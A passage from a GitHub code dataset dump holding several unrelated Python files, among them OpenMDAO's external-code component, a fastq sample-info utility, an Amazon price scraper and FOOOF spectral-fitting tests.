case\nplt.xlabel('X1')\nplt.ylabel('X2')\nplt.title(\"Principal Component Analysis - Two Features - Multiclass Data\")\nplt.show()\n","repo_name":"dgarnitz-zz/Radar-Classification","sub_path":"src/PCA-Multiclass.py","file_name":"PCA-Multiclass.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14428701329","text":"\"\"\"\nErina Stats Managing API\n\"\"\"\n\nfrom time import time\n\nfrom filecenter import extension_from_base, files_in_dir\nfrom safeIO import TextFile\nfrom Erina.stats import files\nfrom Erina.config import Erina as ErinaConfig\nfrom Erina.env_information import erina_dir\n\napi = files.apiStats()\ndb = files.dbStats()\ndiscord = files.discordStats()\nerinahash = files.erinahashStats()\nerina = files.erinaStats()\nexternal = files.externalStats()\nline = files.lineStats()\nsearch = files.searchStats()\ntwitter = files.twitterStats()\n\ndef StatsAppend(file, content=None):\n \"\"\"\n Appends a new stat event to the given file\n \"\"\"\n if ErinaConfig.stats:\n if content is not None:\n file.append(f\"{str(int(time()))} {str(content)}\".replace(\"\\n\", \"\") + \"\\n\")\n else:\n file.append(str(int(time())) + \"\\n\")\n\ndef StatsReset():\n \"\"\"\n Resets the stats\n \"\"\"\n api.searchEndpointCall.write(\"\")\n db.erinaDatabaseLookups.write(\"\")\n db.manamiDBTitleVectorLookups.write(\"\")\n discord.descriptionHit.write(\"\")\n discord.imageSearchHit.write(\"\")\n discord.infoHit.write(\"\")\n erinahash.createdBase64String.write(\"\")\n erinahash.createdHashes.write(\"\")\n erina.cacheFilesCount.write(\"\")\n erina.erinaParsingCount.write(\"\")\n erina.errorsCount.write(\"\")\n erina.fileIOCounter.write(\"\")\n external.anilistAPICalls.write(\"\")\n external.iqdbCalls.write(\"\")\n external.saucenaoAPICalls.write(\"\")\n external.tracemoeAPICalls.write(\"\")\n line.descriptionHit.write(\"\")\n line.imageSearchHit.write(\"\")\n line.infoHit.write(\"\")\n line.storedImages.write(\"\")\n search.searchCount.write(\"\")\n search.anilistIDSearchCount.write(\"\")\n search.imageSearchCount.write(\"\")\n search.titleSearchCount.write(\"\")\n twitter.askingHit.write(\"\")\n twitter.directMessagingHit.write(\"\")\n twitter.responsePolarity.write(\"\")\n twitter.responses.write(\"\")\n twitter.streamHit.write(\"\")\n for file in files_in_dir(erina_dir + \"/Erina/stats/userdefinedStats\"):\n if extension_from_base(file) == \".erinalog\":\n TextFile(erina_dir + \"/Erina/stats/userdefinedStats\").delete()\n ","repo_name":"Animenosekai/Project_Erina","sub_path":"Erina/erina_stats.py","file_name":"erina_stats.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"16589930676","text":"\nfrom os import environ\nfrom Utils.Repeats import handler, get_body\nfrom Utils.Sns import SNSInvoke\n\n\n@handler\ndef test5(event, context):\n body = get_body(event)\n data = SNSInvoke.create_sns_subscription(\n body, environ.get('SNS_TOPIC_ARN'))\n if data['ResponseMetadata'][\"HTTPStatusCode\"] == 200:\n msg = {\"msg\": \"Comentario creado satisfactoriamente\"}\n else:\n msg = {\"msg\": \"Error: Fallo en creación de comentario\"}\n return msg\n","repo_name":"Leisy17/sqlalchemy-practica2","sub_path":"handlers/test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"206327072","text":"from turtle import Turtle\n\nSTEP = 20\n\n\nclass Paddle(Turtle):\n def __init__(self, coordinates):\n super().__init__()\n self.shape('square')\n self.shapesize(stretch_wid=5, stretch_len=1)\n self.color('white')\n self.penup()\n self.goto(coordinates)\n\n# Moves the paddle UP direction\n def up(self):\n # self.pong.forward(MOVE_DISTANCE)\n if self.ycor() <= 230:\n new_y = self.ycor() + STEP\n self.goto(self.xcor(), new_y)\n\n# Moves the paddle DOWN direction\n def down(self):\n # self.paddle.backward(MOVE_DISTANCE)\n if self.ycor() >= -230:\n new_y = self.ycor() - STEP\n self.goto(self.xcor(), new_y)\n\n\n\n","repo_name":"Firdavs0636/Turtle_Pong_Game","sub_path":"paddle.py","file_name":"paddle.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"823665826","text":"Import('env')\nfrom os.path import join, realpath\n\nsrc_filter = []\ncppdefines = []\n\nframework = env.get(\"PIOFRAMEWORK\")[0]\nif framework == 'zephyr':\n src_filter=[\"+<*>\",\n \"-\",\n \"-\",\n \"-\",\n \"-\"]\n cppdefines=[\"ZENOH_ZEPHYR\"]\n\nelif framework == 'arduino':\n platform = env.get(\"PIOPLATFORM\")\n if platform == 'espressif32':\n src_filter=[\"+<*>\",\n \"-\",\n \"-\",\n \"-\",\n \"-\"]\n cppdefines=[\"ZENOH_ESP32\"]\n\n\nenv.Append(SRC_FILTER=src_filter)\nenv.Append(CPPDEFINES=cppdefines)\n\n# pass flags to a global build environment (for all libraries, etc)\nglobal_env = DefaultEnvironment()\nglobal_env.Append(CPPDEFINES=cppdefines)\n","repo_name":"gabrik/esp32-zenoh-pico","sub_path":"play/zenoh-pico/extra_script.py","file_name":"extra_script.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9341798310","text":"\"\"\"Define the ExternalCodeComp and ExternalCodeImplicitComp classes.\"\"\"\nimport os\nimport sys\nimport re\n\nfrom shutil import which\n\nfrom openmdao.core.analysis_error import AnalysisError\nfrom openmdao.core.explicitcomponent import ExplicitComponent\nfrom openmdao.core.implicitcomponent import ImplicitComponent\nfrom openmdao.utils.shell_proc import STDOUT, DEV_NULL, ShellProc\n\n\nclass ExternalCodeDelegate(object):\n \"\"\"\n Handles all the methods related to running a code externally.\n\n Parameters\n ----------\n comp : ExternalCodeComp or ExternalCodeImplicitComp object\n The external code object this delegate is associated with.\n\n Attributes\n ----------\n _comp : ExternalCodeComp or ExternalCodeImplicitComp object\n The external code object this delegate is associated with.\n \"\"\"\n\n def __init__(self, comp):\n \"\"\"\n Initialize.\n \"\"\"\n self._comp = comp\n\n def declare_options(self):\n \"\"\"\n Declare options before kwargs are processed in the init method.\n \"\"\"\n comp = self._comp\n\n comp.options.declare('command', [], types=(list, str),\n desc=\"Command to be executed. If it is a string, then this is the \"\n \"command line to execute and the 'shell' argument to \"\n \"'subprocess.Popen()' is set to True. \"\n \"If it is a list; the first entry is the command to execute.\")\n comp.options.declare('env_vars', {}, desc='Environment variables required by the command.')\n comp.options.declare('poll_delay', 0.0, lower=0.0,\n desc='Delay between polling for command completion. '\n 'A value of zero will use an internally computed default.')\n comp.options.declare('timeout', 0.0, lower=0.0,\n desc='Maximum time to wait for command completion. '\n 'A value of zero implies an infinite wait.')\n comp.options.declare('external_input_files', [],\n desc='List of input files that must exist before execution, '\n 'otherwise an Exception is raised.')\n comp.options.declare('external_output_files', [],\n desc='List of output files that must exist after execution, '\n 'otherwise an Exception is raised.')\n comp.options.declare('fail_hard', types=bool, default=True,\n desc=\"If True, external code errors raise a 'hard' exception \"\n \"(RuntimeError), otherwise errors raise a 'soft' exception \"\n \"(AnalysisError).\")\n comp.options.declare('allowed_return_codes', [0],\n desc=\"List of return codes that are considered successful.\")\n\n def check_config(self, logger):\n \"\"\"\n Perform optional error checks.\n\n Parameters\n ----------\n logger : object\n The object that manages logging output.\n \"\"\"\n # check for the command\n comp = self._comp\n\n cmd = [c for c in comp.options['command'] if c.strip()]\n if not cmd:\n logger.error(\"The command cannot be empty\")\n else:\n program_to_execute = comp.options['command'][0]\n if sys.platform == 'win32':\n if not which(program_to_execute):\n missing = self._check_for_files([program_to_execute])\n if missing:\n logger.error(\"The command to be executed, '%s', \"\n \"cannot be found\" % program_to_execute)\n else:\n if not which(program_to_execute):\n logger.error(\"The command to be executed, '%s', \"\n \"cannot be found\" % program_to_execute)\n\n # Check for missing input files. This just generates a warning during\n # setup, since these files may be generated later during execution.\n missing = self._check_for_files(comp.options['external_input_files'])\n if missing:\n logger.warning(\"The following input files are missing at setup \"\n \"time: %s\" % missing)\n\n def _check_for_files(self, files):\n \"\"\"\n Check that specified files exist.\n\n Parameters\n ----------\n files : iterable\n Contains files to check.\n\n Returns\n -------\n list\n List of files that do not exist.\n \"\"\"\n return [path for path in files if not os.path.exists(path)]\n\n def run_component(self, command=None):\n \"\"\"\n Run this component.\n\n User should call this method from their overriden compute method.\n\n Parameters\n ----------\n command : list\n Optional command. Otherwise use the command in self.options['command'].\n \"\"\"\n comp = self._comp\n\n if not command:\n command = comp.options['command']\n\n comp.return_code = -12345678\n\n if not command:\n raise ValueError('Empty command list')\n\n if comp.options['fail_hard']:\n err_class = RuntimeError\n else:\n err_class = AnalysisError\n\n return_code = None\n\n try:\n missing = self._check_for_files(comp.options['external_input_files'])\n if missing:\n raise err_class(\"The following input files are missing: %s\"\n % sorted(missing))\n return_code, error_msg = self._execute_local(command)\n\n if return_code is None:\n raise AnalysisError('Timed out after %s sec.' %\n comp.options['timeout'])\n\n elif return_code not in comp.options['allowed_return_codes']:\n if isinstance(comp.stderr, str):\n if os.path.exists(comp.stderr):\n with open(comp.stderr, 'r') as stderrfile:\n error_desc = stderrfile.read()\n err_fragment = \"\\nError Output:\\n%s\" % error_desc\n else:\n err_fragment = \"\\n[stderr %r missing]\" % comp.stderr\n else:\n err_fragment = error_msg\n\n raise err_class('return_code = %d%s' % (return_code,\n err_fragment))\n\n missing = self._check_for_files(comp.options['external_output_files'])\n if missing:\n raise err_class(\"The following output files are missing: %s\"\n % sorted(missing))\n\n finally:\n comp.return_code = -999999 if return_code is None else return_code\n\n def _execute_local(self, command):\n \"\"\"\n Run the command.\n\n Parameters\n ----------\n command : list\n List containing OS command string.\n\n Returns\n -------\n int\n Return Code\n str\n Error Message\n \"\"\"\n # Check to make sure command exists\n comp = self._comp\n\n if isinstance(command, str):\n program_to_execute = re.findall(r\"^([\\w\\-]+)\", command)[0]\n else:\n program_to_execute = command[0]\n\n if sys.platform == 'win32':\n if not which(program_to_execute):\n missing = self._check_for_files([program_to_execute])\n if missing:\n raise ValueError(\"The command to be executed, '%s', \"\n \"cannot be found\" % program_to_execute)\n if isinstance(command, list):\n command_for_shell_proc = ['cmd.exe', '/c'] + command\n else:\n command_for_shell_proc = 'cmd.exe /c ' + str(command)\n\n else:\n if not which(program_to_execute):\n raise ValueError(\"The command to be executed, '%s', \"\n \"cannot be found\" % program_to_execute)\n command_for_shell_proc = command\n\n comp._process = \\\n ShellProc(command_for_shell_proc, comp.stdin,\n comp.stdout, comp.stderr, comp.options['env_vars'])\n\n try:\n return_code, error_msg = \\\n comp._process.wait(comp.options['poll_delay'], comp.options['timeout'])\n finally:\n comp._process.close_files()\n comp._process = None\n\n return (return_code, error_msg)\n\n\nclass ExternalCodeComp(ExplicitComponent):\n \"\"\"\n Run an external code as a component.\n\n Default stdin is the 'null' device, default stdout is the console, and\n default stderr is ``external_code_comp_error.out``.\n\n Parameters\n ----------\n **kwargs : dict of keyword arguments\n Keyword arguments that will be mapped into the Component options.\n\n Attributes\n ----------\n stdin : str or file object\n Input stream external code reads from.\n stdout : str or file object\n Output stream external code writes to.\n stderr : str or file object\n Error stream external code writes to.\n _external_code_runner : ExternalCodeDelegate object\n The delegate object that handles all the running of the external code for this object.\n return_code : int\n Exit status of the child process.\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Intialize the ExternalCodeComp component.\n \"\"\"\n self._external_code_runner = ExternalCodeDelegate(self)\n super().__init__(**kwargs)\n\n self.stdin = DEV_NULL\n self.stdout = None\n self.stderr = \"external_code_comp_error.out\"\n\n self.return_code = 0\n\n def _declare_options(self):\n \"\"\"\n Declare options before kwargs are processed in the init method.\n\n Options are declared here because this class is intended to be subclassed by\n the end user. The `initialize` method is left available for user-defined options.\n \"\"\"\n super()._declare_options()\n self._external_code_runner.declare_options()\n\n def check_config(self, logger):\n \"\"\"\n Perform optional error checks.\n\n Parameters\n ----------\n logger : object\n The object that manages logging output.\n \"\"\"\n # check for the command\n self._external_code_runner.check_config(logger)\n\n def compute(self, inputs, outputs):\n \"\"\"\n Run this component.\n\n User should call this method from their overriden compute method.\n\n Parameters\n ----------\n inputs : Vector\n Unscaled, dimensional input variables read via inputs[key].\n outputs : Vector\n Unscaled, dimensional output variables read via outputs[key].\n \"\"\"\n self._external_code_runner.run_component()\n\n\nclass ExternalCodeImplicitComp(ImplicitComponent):\n \"\"\"\n Run an external code as a component.\n\n Default stdin is the 'null' device, default stdout is the console, and\n default stderr is ``external_code_comp_error.out``.\n\n Parameters\n ----------\n **kwargs : dict of keyword arguments\n Keyword arguments that will be mapped into the Component options.\n\n Attributes\n ----------\n stdin : str or file object\n Input stream external code reads from.\n stdout : str or file object\n Output stream external code writes to.\n stderr : str or file object\n Error stream external code writes to.\n _external_code_runner : ExternalCodeDelegate object\n The delegate object that handles all the running of the external code for this object.\n return_code : int\n Exit status of the child process.\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Intialize the ExternalCodeComp component.\n \"\"\"\n self._external_code_runner = ExternalCodeDelegate(self)\n super().__init__(**kwargs)\n\n self.stdin = DEV_NULL\n self.stdout = None\n self.stderr = \"external_code_comp_error.out\"\n\n self.return_code = 0\n\n def _declare_options(self):\n \"\"\"\n Declare options before kwargs are processed in the init method.\n\n Options are declared here because this class is intended to be subclassed by\n the end user. The `initialize` method is left available for user-defined options.\n \"\"\"\n super()._declare_options()\n self._external_code_runner.declare_options()\n\n # ImplicitComponent has two separate commands to run.\n self.options.declare('command_apply', [],\n desc='command to be executed for apply_nonlinear')\n self.options.declare('command_solve', [],\n desc='command to be executed for solve_nonlinear')\n self.options.undeclare('command')\n\n def check_config(self, logger):\n \"\"\"\n Perform optional error checks.\n\n Parameters\n ----------\n logger : object\n The object that manages logging output.\n \"\"\"\n self._external_code_runner.check_config(logger)\n\n def apply_nonlinear(self, inputs, outputs, residuals):\n \"\"\"\n Compute residuals given inputs and outputs.\n\n The model is assumed to be in an unscaled state.\n\n Parameters\n ----------\n inputs : Vector\n Unscaled, dimensional input variables read via inputs[key].\n outputs : Vector\n Unscaled, dimensional output variables read via outputs[key].\n residuals : Vector\n Unscaled, dimensional residuals written to via residuals[key].\n \"\"\"\n command = self.options['command_apply']\n if command:\n self._external_code_runner.run_component(command=command)\n\n def solve_nonlinear(self, inputs, outputs):\n \"\"\"\n Compute outputs given inputs. The model is assumed to be in an unscaled state.\n\n Parameters\n ----------\n inputs : Vector\n Unscaled, dimensional input variables read via inputs[key].\n outputs : Vector\n Unscaled, dimensional output variables read via outputs[key].\n \"\"\"\n command = self.options['command_solve']\n if command:\n self._external_code_runner.run_component(command=command)\n","repo_name":"OpenMDAO/OpenMDAO","sub_path":"openmdao/components/external_code_comp.py","file_name":"external_code_comp.py","file_ext":"py","file_size_in_byte":14473,"program_lang":"python","lang":"en","doc_type":"code","stars":451,"dataset":"github-code","pt":"53"} +{"seq_id":"8797452639","text":"import sys\nsys.setrecursionlimit(100000000)\nN = int(input())\nC = list(input().split())\nG = [[] for _ in range(N)]\nmod = 10**9 + 7\nfor _ in range(N-1):\n a,b = map(int,input().split())\n a -= 1\n b -= 1\n G[a].append(b)\n G[b].append(a)\ndp = [[-1,-1,-1] for _ in range(N)]\ndef dfs(i,j,pi):\n if dp[i][j] >= 0:\n return dp[i][j]\n if C[i] == 'a':\n cnum = 0\n else:\n cnum = 1\n if j == 1-cnum:\n dp[i][j] = 0\n return 0\n elif j == cnum:\n ans = 1\n for chi in G[i]:\n if chi == pi:\n continue\n # i-chiの辺を切ったらchiの部分木はa,b両方持ってる必要があり、切らなかったらa(or b)のみ持ってる必要がある。\n ans = ans*(dfs(chi,cnum,i) + dfs(chi,2,i))%mod\n dp[i][cnum] = ans\n else:\n ans = 1\n for chi in G[i]:\n if chi == pi:\n continue\n # とりあえずi以外で条件満たすやつ全部足す\n # i-chiの辺を切ったらchiの部分木はa,b両方持ってる必要があり、切らなかったら他の子との兼ね合いで満たす可能性あるから全部ok\n ans = ans*(dfs(chi,0,i) + dfs(chi,1,i) + 2*dfs(chi,2,i))%mod\n # iを含む部分木がa (or b)のみ持ってる場合を引く\n ans -= dfs(i,cnum,pi)\n ans %= mod\n dp[i][2] = ans\n return ans\nans = dfs(0,2,0)\nprint(ans)","repo_name":"shimamura10/Atcoder","sub_path":"典型90/73_2.py","file_name":"73_2.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22560337255","text":"# coding=utf-8\nimport os\nimport re\nimport json\n__author__ = 'gudeqing'\n\n\ndef get_fastq_info(fastq_info:tuple, pair_info=None, out='fastq.info.json',\n r1_name=\"(.*).R1.fq.gz\", r2_name=\"(.*).R2.fq.gz\",\n link_data=False, add_s_to_numeric_name=False, middle2underscore=False):\n \"\"\"\n :param fastq_info: a list with elements from [fastq file, fastq parent dir, fastq_info.txt, fastq_info.json]\n :param pair_info: 'pair info file that contains two columns without any header: [tumor_name, normal_name]\n :param r1_name: python regExp that describes the full name of read1 fastq file name. It requires at least one pair small brackets, and the string matched in the first pair brackets will be used as sample name. Example: '(.*).R1.fq.gz'\n :param r2_name: python regExp that describes the full name of read2 fastq file name. It requires at least one pair small brackets, and the string matched in the first pair brackets will be used as sample name. Example: '(.*).R2.fq.gz'\n :param link_data: bool to indicate if to make soft links for fastq files\n :param out: output file that contains three columns: [sample_name, read1_abs_path, read2_abs_path]\n :param add_s_to_numeric_name: bool value to indicate if to add a 'S' letter at the head of the sample name that startswith numeric string.\n :param middle2underscore: bool value to indicate if to transform '-' letter to '_' letter for a sample name.\n :return: result_dict: {sample: [[r1, r1'], [r2, r2']], ...}\n \"\"\"\n result_dict = dict()\n fastq_dirs = []\n fastq_files = []\n for each in fastq_info:\n if os.path.isdir(each):\n fastq_dirs.append(os.path.abspath(each))\n elif os.path.isfile(each):\n if each.endswith(('.fq', 'fq.gz', 'fastq', 'fastq.gz')):\n fastq_files.append(os.path.abspath(each))\n elif each.endswith('.json'):\n with open(each) as f:\n result_dict.update(json.load(f))\n else:\n with open(each) as f:\n for line in f:\n lst = line.strip().split('\\t')\n tmp = result_dict.setdefault(lst[0], list())\n tmp.append(lst[1].split(';'))\n if len(lst) >= 3:\n tmp.append(lst[2].split(';'))\n\n if r1_name == r2_name:\n raise Exception('read1 filename == read2 filename ?!')\n\n if fastq_files:\n for each in fastq_files:\n name = os.path.basename(each)\n directory = os.path.dirname(each)\n is_read1 = True\n match = re.fullmatch(r1_name, name)\n if not match:\n match = re.fullmatch(r2_name, name)\n is_read1 = False\n if match:\n # first matched group is sample name\n sample = match.groups()[0]\n result_dict.setdefault(sample, [[], []])\n if is_read1:\n if each not in result_dict[sample][0]:\n result_dict[sample][0].append(each)\n else:\n print(f'warn: duplicated path found for {each}, and we will only keep the first one!')\n else:\n if each not in result_dict[sample][1]:\n result_dict[sample][1].append(each)\n else:\n print(f'warn: duplicated path found for {each}, and we will only keep the first one!')\n\n if fastq_dirs:\n for path in fastq_dirs:\n for root, dirs, files in os.walk(path):\n for each in files:\n is_read1 = True\n match = re.fullmatch(r1_name, each)\n if not match:\n match = re.fullmatch(r2_name, each)\n is_read1 = False\n if match:\n # first matched group is sample name\n sample = match.groups()[0]\n result_dict.setdefault(sample, [[], []])\n file_path = os.path.join(root, each)\n if is_read1:\n if file_path not in result_dict[sample][0]:\n result_dict[sample][0].append(file_path)\n else:\n print(f'warn: duplicated path found for {file_path}, and we will only keep the first one!')\n else:\n if file_path not in result_dict[sample][1]:\n result_dict[sample][1].append(file_path)\n else:\n print(f'warn: duplicated path found for {file_path}, and we will only keep the first one!')\n\n new_result = dict()\n if link_data:\n os.mkdir('rawdata')\n os.chdir('rawdata')\n for sample, lst in result_dict.items():\n read1 = sorted(lst[0])\n read2 = sorted(lst[1])\n if middle2underscore:\n sample = sample.replace('-', '_')\n if add_s_to_numeric_name:\n if sample.startswith(('0', '1', '2', '3', '4', '5', '6', '7', '8', '9')):\n sample = 'S' + sample\n new_result[sample] = [read1, read2]\n if link_data:\n # make link\n os.mkdir(sample)\n for each in read1:\n os.symlink(each, os.path.join(sample, os.path.basename(each)))\n for each in read2:\n os.symlink(each, os.path.join(sample, os.path.basename(each)))\n\n if pair_info:\n with open(pair_info) as fr, open(out+'.pair', 'w') as f:\n for line in fr:\n tumor, normal = line.strip().split()\n if tumor in new_result and normal in new_result:\n tr1 = ';'.join(new_result[tumor][0])\n tr2 = ';'.join(new_result[tumor][1])\n nr1 = ';'.join(new_result[normal][0])\n nr2 = ';'.join(new_result[normal][1])\n lst = [tumor, tr1, tr2, normal, nr1, nr2]\n f.write('\\t'.join(lst) + '\\n')\n else:\n print(f'{tumor} or {normal} fastq is not found !')\n\n if out.endswith('.json'):\n with open(out, 'w') as f:\n json.dump(new_result, f, indent=2)\n else:\n with open(out, 'w') as f:\n for k, v in new_result.items():\n read1 = ';'.join(v[0])\n read2 = ';'.join(v[1])\n f.write('{k}\\t{read1}\\t{read2}\\n'.format(k=k, read1=read1, read2=read2))\n\n return new_result\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('-fastq_info', required=True, nargs='+', help=\"A list with elements from [fastq file, fastq parent dir, fastq_info.txt, fastq_info.json].\")\n parser.add_argument('-r1_name', required=True, help=\"python regExp that describes the full name of read1 fastq file name. It requires at least one pair small brackets, and the string matched in the first pair brackets will be used as sample name. Example: '(.*).R1.fq.gz'\")\n parser.add_argument('-r2_name', required=True, help=\"python regExp that describes the full name of read2 fastq file name. It requires at least one pair small brackets, and the string matched in the first pair brackets will be used as sample name. Example: '(.*).R2.fq.gz'\")\n parser.add_argument('-out', required=False, default='fastq.info.json', help='output file that contains three columns: [sample_name, read1_abs_path, read2_abs_path]')\n parser.add_argument('-pair_info', required=False, help='pair info file that contains two columns without any header: [tumor, normal]')\n parser.add_argument('--add_s_to_numeric_name', action='store_true', default=False, help=\"if to add a 'S' letter at the head of the sample name that startswith numeric string.\")\n parser.add_argument('--middle2underscore', action='store_true', default=False, help=\"if to transform '-' letter to '_' letter for a sample name\")\n parser.add_argument('--link', action='store_true', default=False, help=\"if to transform '-' letter to '_' letter for a sample name\")\n args = parser.parse_args()\n get_fastq_info(\n fastq_info=args.fastq_info,\n r1_name=args.r1_name, r2_name=args.r2_name, pair_info=args.pair_info,\n link_data=args.link, out=args.out,\n add_s_to_numeric_name=args.add_s_to_numeric_name,\n middle2underscore=args.middle2underscore\n )\n","repo_name":"gudeqing/basefly","sub_path":"utils/get_fastq_info.py","file_name":"get_fastq_info.py","file_ext":"py","file_size_in_byte":8573,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"14977531269","text":"import numpy as np\n\n\ndef get_trainX_trainY(window, grouped_X_len, grouped_Y_len, fin_X_shape, fin_Y_shape):\n trainX = []\n trainY = []\n for i in range(0, len(window)):\n x = []\n for jx in range(0, grouped_X_len):\n for kx in window[i][jx]:\n x.append(kx)\n y = []\n for jy in range(grouped_X_len, grouped_X_len + grouped_Y_len):\n for ky in window[i][jy]:\n y.append(ky)\n trainX.append(x)\n trainY.append(y)\n trainX = np.array(trainX)\n trainY = np.array(trainY)\n trainX = np.reshape(trainX, (len(window), fin_X_shape[0], fin_X_shape[1]))\n trainY = np.reshape(trainY, (len(window), fin_Y_shape[0], fin_Y_shape[1]))\n return np.array(trainX), np.array(trainY)\n\n","repo_name":"AntonioShen/Antiburnt_deeplearning","sub_path":"version_2/Helper/TrainingSetHelper.py","file_name":"TrainingSetHelper.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"5235682826","text":"from bs4 import BeautifulSoup\nimport requests\n\n\ndef getheadsetAZ():\n page = requests.get(\"https://www.amazon.com.mx/b/ref=s9_acss_bw_cg_vgps4_2c1_w?node=17883788011&pf_rd_m=A3TO6F13CSVUA4&pf_rd_s=merchandised-search-4&pf_rd_r=NBK4S017KQ596XKHA2EM&pf_rd_t=101&pf_rd_p=2adca235-f694-4012-b6af-c2aa0998654d&pf_rd_i=17883787011\", verify=True)\n soup = BeautifulSoup(page.content, 'html.parser')\n container_items_offers = soup.find(class_=\"acswidget acswidget-carousel celwidget a-spacing-base acswidget-carousel--shoveler acswidget-carousel--default\")\n offers = container_items_offers.find_all(class_='a-section acs-product-block acs-product-block--default')\n\n itemsML = []\n for o in offers:\n today_offer = o.find(class_='a-section a-spacing-micro acs-product-block__price')\n if today_offer:\n url = o.find(class_='a-color-base a-link-normal')\n print(url['href'])\n img = o.find('img')\n old_price = o.find(class_='a-price acs-product-block__price--strikethrough').get_text()\n new_price = o.find(class_='a-price acs-product-block__price--buying')\n new_price_span = new_price.find('span').get_text()\n title = o.find('p').get_text()\n data = {\n 'item': {\n 'url': url['href'],\n 'img': img['data-src'],\n 'title': title,\n 'old_price': old_price,\n 'new_price_span': new_price_span\n }\n }\n itemsML.append(data)\n print(itemsML)\n return itemsML\n\n\ngetheadsetAZ()\n\n","repo_name":"Anakinstone/zoom-prototype-Django-","sub_path":"comparador/scrappers/headsetsAZ.py","file_name":"headsetsAZ.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2354033838","text":"\"\"\"Tests for fooof.objs.fit, including the FOOOF object and it's methods.\n\nNOTES\n-----\nThe tests here are not strong tests for accuracy.\nThey serve rather as 'smoke tests', for if anything fails completely.\n\"\"\"\n\nimport numpy as np\nfrom py.test import raises\n\nfrom fooof.core.items import OBJ_DESC\nfrom fooof.core.errors import FitError\nfrom fooof.core.utils import group_three\nfrom fooof.sim import gen_power_spectrum\nfrom fooof.data import FOOOFSettings, FOOOFMetaData, FOOOFResults\nfrom fooof.core.errors import DataError, NoDataError, InconsistentDataError\n\nfrom fooof.tests.settings import TEST_DATA_PATH\nfrom fooof.tests.tutils import get_tfm, plot_test\n\nfrom fooof.objs.fit import *\n\n###################################################################################################\n###################################################################################################\n\ndef test_fooof():\n \"\"\"Check FOOOF object initializes properly.\"\"\"\n\n assert FOOOF(verbose=False)\n\ndef test_fooof_has_data(tfm):\n \"\"\"Test the has_data property attribute, with and without model fits.\"\"\"\n\n assert tfm.has_data\n\n ntfm = FOOOF()\n assert not ntfm.has_data\n\ndef test_fooof_has_model(tfm):\n \"\"\"Test the has_model property attribute, with and without model fits.\"\"\"\n\n assert tfm.has_model\n\n ntfm = FOOOF()\n assert not ntfm.has_model\n\ndef test_fooof_n_peaks(tfm):\n \"\"\"Test the n_peaks property attribute.\"\"\"\n\n assert tfm.n_peaks_\n\ndef test_fooof_fit_nk():\n \"\"\"Test FOOOF fit, no knee.\"\"\"\n\n ap_params = [50, 2]\n gauss_params = [10, 0.5, 2, 20, 0.3, 4]\n nlv = 0.0025\n\n xs, ys = gen_power_spectrum([3, 50], ap_params, gauss_params, nlv)\n\n tfm = FOOOF(verbose=False)\n tfm.fit(xs, ys)\n\n # Check model results - aperiodic parameters\n assert np.allclose(ap_params, tfm.aperiodic_params_, [0.5, 0.1])\n\n # Check model results - gaussian parameters\n for ii, gauss in enumerate(group_three(gauss_params)):\n assert np.allclose(gauss, tfm.gaussian_params_[ii], [2.0, 0.5, 1.0])\n\ndef test_fooof_fit_nk_noise():\n \"\"\"Test FOOOF fit on noisy data, to make sure nothing breaks.\"\"\"\n\n ap_params = [50, 2]\n gauss_params = [10, 0.5, 2, 20, 0.3, 4]\n nlv = 1.0\n\n xs, ys = gen_power_spectrum([3, 50], ap_params, gauss_params, nlv)\n\n tfm = FOOOF(max_n_peaks=8, verbose=False)\n tfm.fit(xs, ys)\n\n # No accuracy checking here - just checking that it ran\n assert tfm.has_model\n\ndef test_fooof_fit_knee():\n \"\"\"Test FOOOF fit, with a knee.\"\"\"\n\n ap_params = [50, 10, 1]\n gauss_params = [10, 0.3, 2, 20, 0.1, 4, 60, 0.3, 1]\n nlv = 0.0025\n\n xs, ys = gen_power_spectrum([1, 150], ap_params, gauss_params, nlv)\n\n tfm = FOOOF(aperiodic_mode='knee', verbose=False)\n tfm.fit(xs, ys)\n\n # Check model results - aperiodic parameters\n assert np.allclose(ap_params, tfm.aperiodic_params_, [1, 2, 0.2])\n\n # Check model results - gaussian parameters\n for ii, gauss in enumerate(group_three(gauss_params)):\n assert np.allclose(gauss, tfm.gaussian_params_[ii], [2.0, 0.5, 1.0])\n\ndef test_fooof_fit_measures():\n \"\"\"Test goodness of fit & error metrics, post model fitting.\"\"\"\n\n tfm = FOOOF(verbose=False)\n\n # Hack fake data with known properties: total error magnitude 2\n tfm.power_spectrum = np.array([1, 2, 3, 4, 5])\n tfm.fooofed_spectrum_ = np.array([1, 2, 5, 4, 5])\n\n # Check default goodness of fit and error measures\n tfm._calc_r_squared()\n assert np.isclose(tfm.r_squared_, 0.75757575)\n tfm._calc_error()\n assert np.isclose(tfm.error_, 0.4)\n\n # Check with alternative error fit approach\n tfm._calc_error(metric='MSE')\n assert np.isclose(tfm.error_, 0.8)\n tfm._calc_error(metric='RMSE')\n assert np.isclose(tfm.error_, np.sqrt(0.8))\n with raises(ValueError):\n tfm._calc_error(metric='BAD')\n\ndef test_fooof_checks():\n \"\"\"Test various checks, errors and edge cases in FOOOF.\n This tests all the input checking done in `_prepare_data`.\n \"\"\"\n\n xs, ys = gen_power_spectrum([3, 50], [50, 2], [10, 0.5, 2])\n\n tfm = 